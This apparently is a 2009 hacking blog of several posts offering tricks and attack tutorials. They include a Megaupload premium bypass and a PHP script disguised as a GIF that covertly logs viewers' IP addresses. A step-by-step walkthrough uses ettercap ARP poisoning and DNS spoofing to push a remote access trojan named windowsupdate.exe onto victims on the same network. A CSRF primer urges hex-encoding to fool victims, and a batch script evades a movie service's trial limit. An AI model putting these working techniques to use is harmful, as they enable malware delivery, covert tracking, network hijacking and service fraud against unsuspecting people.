New Megaupload Trick

Friday, October 30, 2009

With no premium account?

Just do this with your links;

If the download link is say:

http://www.megaupload.com/?d=85GT7Z2W

Just add mgr_dl.php after the .com/ so the new link becomes:

http://www.megaupload.com/mgr_dl.php?d=85GT7Z2W

No captcha, No countdown, Full speed.

Get anyone's IP address

Thursday, October 15, 2009

Okay, this is a very simple tutorial, but I see a lot of requests 'WELL HOW DO I GET THURR IP ADDRESS'. Well, it's very simple. Here's what you're going to need:

  • A web host that supports PHP. A good free one is freehostia.com
  • .htaccess
  • shakira.gif
  • A real pic of shakira (or any image you'd like)
  • ips.txt

Alright, so in a folder create an ips.txt, .htaccess file, gather an image and open up your image editor to a blank tab, and let's begin! First off, here's what the code is going to look like for our IP stealer!
$myImage = imagecreatefromjpeg('shakira.jpg');
header("Content-type: image/jpg");
imagejpeg($myImage);
imagedestroy($myImage);


    if (!empty($_SERVER['HTTP_CLIENT_IP']))
    {
      $v_ip=$_SERVER['HTTP_CLIENT_IP'];
    }
    elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
    {
      $v_ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    else
    {
      $v_ip=$_SERVER['REMOTE_ADDR'];
    }

$v_date = date("l d F H:i:s");

$fp = fopen("ips.txt", "a");
fwrite($fp, "IP: \t$v_ip - DATE: \t$v_date\n\n");
fclose($fp);
?>


First off, towards the top make sure that you change 'shakira.jpg' to the name of your image, or it will not work!

Okay, so what it's doing is at the top, it's basically grabbing the real image shakira.jpg and echoing it, and at the bottom is the IP stealer I've created. It's simple, and it's added a few extra measures in there so that even if they're behind a proxy, it'll still return THEIR IP. So, you paste all that in your editor, and save it as shakira.GIF. Yes, save it as a .gif file. The MIME types above that I used (jpeg) do NOT matter, as you'll see here. So, save it as shakira.gif.

Then, you can modify this part:
$fp = fopen("ips.txt", "a");
fwrite($fp, "IP: \t$v_ip - DATE: \t$v_date\n\n");
fclose($fp);


And, instead of using ips.txt, you can use HTML and make nice fancy tables and things, I like mine simple though. Easier to copy and paste and do what I will with it

In your .htaccess file, you're going to add the line:
AddHandler application/x-httpd-php .gif

This code will allow the .gif file extension to parse the PHP code, so that the image isn't a .php file and inconspicious.

So now, you're going to take the real image, shakira.gif, ips.txt and the .htaccess file and upload them all to your freehostia account. Now, you can link the image in a myspace and get IPs that way, or if you need a specific IP address you can tell a person to look at your pic and link them to it, etc. You get the picture, use your imagination!

Get your Rat onto a pc that's on the same Network.

Wednesday, October 14, 2009

his is how to get someone to download your rat if you're on the same network

This isn't supposed to be some amazing tutorial. I just want to have this so I don't have to keep answering he same damn question over and over again..

Start by downloading backtrack 4 and burning the iso.
http://www.remote-exploit.org/backtrack_download.html

Boot into backtrack and open the file browser, and browse to /var/www/. There will be file calledindex.html..


Now copy your rat into the same directory and name it windowsupdate.exe

Start apache
/etc/init.d/apache2 start

 open firefox and navigate to 127.0.0.1. Your fake update page should show up.
Now set up the dns_spoofing configuraton

echo "* A 192.168.1.101" >> /usr/share/ettercap/etter.dns

Replace 192.168.1.101 with your own ip (ifconfig)
Use nmap to find your target ip


nmap -sP your_subnet/24

Now arp-poison with ettercap using the dns_spoof plugin.

ettercap -T -i wlan0 -M arp:remote /192.168.1.1/ /192.168.1.102/ -P dns_spoof

replace 192.168.1.102 with your target's ip.
replace 192.168.1.1 with your gateway ip.
replace wlan0 with your interface.

If you want to target everyone on the network you can use the following command.

ettercap -T -i wlan0 -M arp:remote /192.168.1.1/ // -P dns_spoof

Now every time they try to navigate to a web page, they will be redirected to your update page.
Some people will be suspicious but after 5 min of not being able to browse, anyone will give in.

Once you get remote access stop ettercap right away and run the following command in the target computer's cmd.

ipconfig /flushdns

This will let them browse again

Basics of Cross Site Request Forgery

** Well first, what is CSRF?

CSRF is Cross Site Request Forgery, also abbreviated as XRF, Sea Surf, and session Riding are also names for it.

&& Many people think that CSRF is the same as XSS, this is completely untrue. As you read through this you will learn why.
&& Although XSS vulns are not necessary for a CSRF, they will make it easier in most cases. XSS is not needed for CSRF.

-- in CSRF, the victim sends the attackers request to the webserver without knowing about it.
 


** So how do I use it?

Here would be a simple way to log the user out of the website.


The reason for the height and width being "1" is so that the victim won't notice an image that didn't load.

This can also be used using Iframes, automatic redirects (like a meta refresh) but this will alert the victim.


** A little more about the vulnerability:

Everything a user can do, CSRF can do. Unless it is specifically protected against, mainly by using tokens.
The user must be logged in to the website.

** Who has been vulnerable to this in the past?

Gmail, attackers could make filters, that when a user received an email containing "password" it would be forwarded and deleted.
Myspace
Facebook
Twitter
The list goes on, alot of websites still don't protect against it.

** Tips

Use hex coding, it won't be as suspicious, the victim will think it's just random characters.

Getting Free Movies Non Stop through Graboid

Saturday, October 10, 2009

So if some of you may have heard, Graboid offers free movies, TV shows and more to download. It is subscription based on bandwidth. First,

Then after you open the program you will have the option to create and account.


Create it and log in. You will notice your bandwidth restriction, and your account will expire in a month, when you have to buy a subscription.


Once your account has expired. I have discovered a new way to make accounts (NOTE: After your account is created, you will never be able to create a free account again, nor through the program or website).

Make this batch script:
cd %appdata%
del MozillaControl /F /q
cd “%LOCALAPPDATA%\Graboid_Inc\”
del *.* /F /q


Run the batch file, and behold, the new account button shall appear again. Enter a different email address than previous, and your good to go.

Hope this helped!